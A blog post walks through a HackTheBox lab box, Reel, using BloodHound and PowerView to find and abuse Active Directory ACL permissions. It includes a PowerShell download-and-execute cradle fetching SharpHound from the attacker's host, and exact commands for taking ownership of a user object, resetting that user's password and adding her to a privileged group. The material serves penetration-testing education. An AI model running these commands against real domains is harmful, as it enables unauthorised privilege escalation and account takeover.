Attacking A.D.

Using BloodHound

Attacking Windows Active Directory using BloodHound

In this blog post I would like to talk about an amazing tool called BloodHound [1]. It is a tool that I didn't have the chance to play with during my OSCP Certification and so I decided to write about how someone could use it to extract important information, that would allow him to escalate his privileges up to Domain Admin.

I will do this through the exploitation of a HackTheBox box called Reel. In the specific box we have an small Active Directory server, with a few users that someone will have to pivot through them to finally reach the Domain Admin account.

What is BloodHound?

So, BloodHound uses graph theory to present relationships that users have in an Active Directory environment [2]. It allows an attacker to quickly identify the users that he will have to attack in order to gain admin rights. Furthermore, BloodHound has the ability to identify the shorest path that someone would have to take in order to reach a Domain Admin group in the environment.

A quick guide to install BloodHound in Kali is [3].

ACL & Abusable ACEs

An Access Control List (ACL) is a list of Access Control Entries (ACEs). Every ACE in an ACL associates a User object and its Access Rights. As a result, abusing ACEs essentialy means exploiting the permissions that an object has in the Active Directory environment. Think about a user that is in the Domain Admins group, this means that the specific user has control over any other object in that Domain.

A few of the ACEs that you should keep in mind are described below [4,5,6].

ForceChangePassword: You can change a user's password, without the need to now her current password, and can be exploited using the Set-DomainUserPassword method.

AddMembers: The attacker can add users, groups or computers to the group his is trying to attack and can be exploited using Add-DomainGroupMember method.

GenericAll: The attacker is able to control the specific object that has the GenericAll ACE and it can be exploited using the Set-DomainUserPassword or Add-DomainGroupMember methods.

GenericWrite: The ability to update any non-protected target object parameter value. For example, update the “scriptPath” parameter value on a target user object to cause that user to run your specified executable/commands the next time that user logs on. Abused with Set-DomainObject.

WriteOwner: The attacker here is able to change the owner of an object. When this happens the attacker could then, for example, proceed to change the user's password. To take over the object we can use the Set-DomainObjectOwner method.

WriteDACL: The ability to write a new ACE to the target object’s DACL. For example, an attacker may write a new ACE to the target object DACL giving the attacker “full control” of the target object. Abused with Add-NewADObjectAccessControlEntry.

AllExtendedRights: The ability to perform any action associated with extended Active Directory rights against the object. For example, adding principals to a group and force changing a target user’s password are both examples of extended rights. Abused with Set-DomainUserPassword or Add-DomainGroupMember.

Now that we have all that information about abusing ACEs, we can go ahead and exploit them.

Exploit Analysis

Back on the Reel box, I found the SSH password for the user Tom and so I was able to login as him.

I then used Python's SimpleHTTPServer to download & load the SharpHound.ps1 from [7] in to the Reel box.

 IEX(New-Object Net.WebClient).DownloadString('http://ipaddress/SharpHound.ps1'); 

Now in order to run the Powershell script and collect all the information someone can type:

 Invoke-BloodHound -CollectionMethod All -ZipFileName

Running this saves all the data in the file. If you unzip the file you will get a number of .json files that we can pass into BloodHound to analyze.

Analyzing the Results

Now that we have the file all we have to do is move it back to our Kali box where BloodHound is installed, drag and drop it in there and BloodHound will do the rest.

One of the BloodHound queries that we could run is "Find all Domain Admins". Here we can see the accounts that are a member of the Domain Admins group in the Reel box. This way we can find out which user we have to attack in order to gain Domain Admin privileges.

After, a little bit of search using bloodhound I identified the connection below.

As we can see from the graph above, in order to reach the backup_admins group we would need to move from the Tom user to Claire and from there to the backup_admins group.

At the moment, we can see that Tom has WriteOwner permissions on Claire. From [5] and the description we found above, we get that the WriteOwner permission:

Provides the ability to take ownership of an object.
The owner of an object can gain full control rights on the object.
The right to assume ownership of the object.
The user must be an object trustee.
The user cannot transfer the ownership to other users.

As a result, it is possible for Tom to get the ownership of the Claire user object, using the Set-DomainObjectOwner method. The idea here is to first take ownership of the Claire user object and then give Tom the permission to reset Claire's password. After that we will be able to use SSH to login back as Claire.

In order for the exploit to be successful I used PowerView [8,9]. The second link is the most important one, because HarmJ0y created a gist with the commands that someone needs know when trying to exploit an A.D. using PowerView.

PS C:\Users\tom> $claire = Get-ADUser claire
PS C:\Users\tom> Get-Acl AD:$claire

From the image above we can see that the current owner of the Claire User Object is NT Authority\system. In order for Tom to take the ownership of the Claire user object I used the Set-DomainObjectOwner method:

PS C:\Users\tom> Set-DomainObjectOwner -identity claire -OwnerIdentity tom
PS C:\Users\tom> get-acl AD:$claire

We can now reset Claire's password using PowerView again and then login via SSH, using the Add-DomainObjectAcl method taken from [9].

1. Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
2. $cred = ConvertTo-SecureString "th!sP@ss" -AsPlainText -force
3. Set-DomainUserPassword -Identity claire -AccountPassword $cred

In order to move from the Claire user object to the Backup_Admins group, we are going to exploit the WriteDACL permissions that Claire has on Backup_Admins.

WriteDACL: Provides the ability to modify security on an object which can lead to Full Control of the object.
The right to modify the DACL in the object security descriptor.
Example: A service account may be granted this right to perform delegation in AD. If an attacker can guess this password (or potentially crack it by Kerberoasting), they now set their own permissions on associated objects which can lead to Full Control of an object which may involve exposure of a LAPS controlled local Administrator password.

Based on that, we can now add Claire in the Backup_Admins group.

1. net group backup_admins
2. net group backup_admins claire /add
3. logout & log back in

We could also use Powershell & PowerSploit to do this through the use of Add-DomainGroupMember. This method adds a domain user (or group) to an existing domain group [10].

Add-DomainGroupMember [-Identity]  -Members  [-Domain ] [-Credential ]
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
Add-DomainGroupMember -Identity 'Backup_Admins' -Members 'claire' -Credential $cred

As a result, we can now use SSH to login as Claire and observe that we now have Administrator privileges.


[1] BloodHound
[2] BloodHound Wiki
[3] Installing BloodHound in Kali
[4] ACL Attack Path
[5] Scanning for Active Directory Privileges & Privileged Accounts
[6] Blackhat presentation about Exploiting ACEs
[7] SharpHound PowerShell
[8] PowerView
[9] PowerView 3.0 Tips & Tricks
[10] Add-DomainGroupMember Method